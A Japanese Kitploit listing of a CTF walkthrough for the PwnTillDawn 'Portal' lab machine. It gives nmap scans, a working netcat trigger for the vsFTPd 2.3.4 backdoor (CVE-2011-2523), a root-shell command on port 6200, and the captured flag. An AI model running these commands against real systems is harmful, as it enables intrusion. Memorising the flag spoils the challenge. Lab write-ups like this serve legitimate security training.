Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
特権昇格偵察脆弱性分析エクスプロイトポストエクスプロイトCTFペネトレーションテスト学習と教育
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

"Portal"マシンに対する詳細なペネトレーションテストのチュートリアルおよびエクスプロイト報告書であり、CVE-2011-2523 (vsFTPd 2.3.4 バックドア) に焦点を当ててルートアクセスを達成する。

リポジトリを見る
25ヶ月前未レビュー

🔐 脆弱性評価とペネトレーションテスト (VAPT)

📌 プロジェクト: ターゲット攻略ウォークスルー

⚠️ このプロジェクトは教育および許可されたテスト目的のみです。
システムへの不正アクセスは固く禁止されています。


👨‍💻 著者

SYAFIQ
役割: リードペネトレーションテスター


🎯 ターゲット情報

  • ターゲットIP: 10.150.150.12
  • オペレーティングシステム: Ubuntu Linux
  • ステータス: 🔴 重大 (バックドア検出)
  • 脆弱性: CVE-2011-2523 (vsFTPd バックドア)

🧭 攻撃概要

フェーズツール説明
発見Nmapネットワークをスキャンして稼働中のホストを特定
列挙Nmapサービスとバージョンを特定
分析NSEスクリプト既知の脆弱性を検出
エクスプロイトNetcatバックドアを発動
ポストエクスプロイトターミナルrootアクセスを取得しフラグを取得

🚀 ステップバイステップのウォークスルー

🔍 ステップ1: ネットワーク偵察

ネットワーク内のアクティブホストをスキャン:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ 結果:

-8台のホストを検出 -ターゲットを特定: 10.150.150.12

🔎 ステップ2: サービス列挙

開いているポートとサービスをスキャン:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ 発見事項:

-ポート21 → FTP (vsftpd) -ポート22 → SSH (OpenSSH 8.2p1)

⚠️ ステップ3: 脆弱性スキャン

既知のFTPバックドア脆弱性を確認:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 結果:

-ターゲットは脆弱 -CVE-2011-2523 確認

💣 ステップ4: エクスプロイト

悪意のあるユーザー名を使用してバックドアを発動:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ これにより、ポート6200に隠されたrootシェルが開きます

🔓 ステップ5: アクセス獲得 (ルートシェル)

バックドアに接続し、コマンドを実行:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ 結果:

ルートアクセスを取得 uid=0(root) 確認

🏁 フラグ獲得:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 重要な教訓

古くなったサービスは常に更新する (vsFTPdは脆弱だった) 設定ミスのあるサービスはシステム全体の侵害につながる可能性がある 簡単なスキャンで重大な脆弱性が明らかになる -🛡️ 推奨事項 -🔄 FTPサービスを最新バージョンに更新 -🚫 不要なサービスを無効化 -🔐 ファイアウォールを使用してアクセスを制限 -📊 定期的なセキュリティ監査を実施 -📚 免責事項

このプロジェクトは厳密に以下の目的で作成されています:

サイバーセキュリティの学習 倫理的ハッキングの実践 許可されたペネトレーションテスト

❌ この知識を違法行為に使用しないでください。

⭐ 最後に

「セキュリティは製品ではなく、プロセスである。」 — 常にテスト、監視、改善を続けよう。

ツールをダウンロード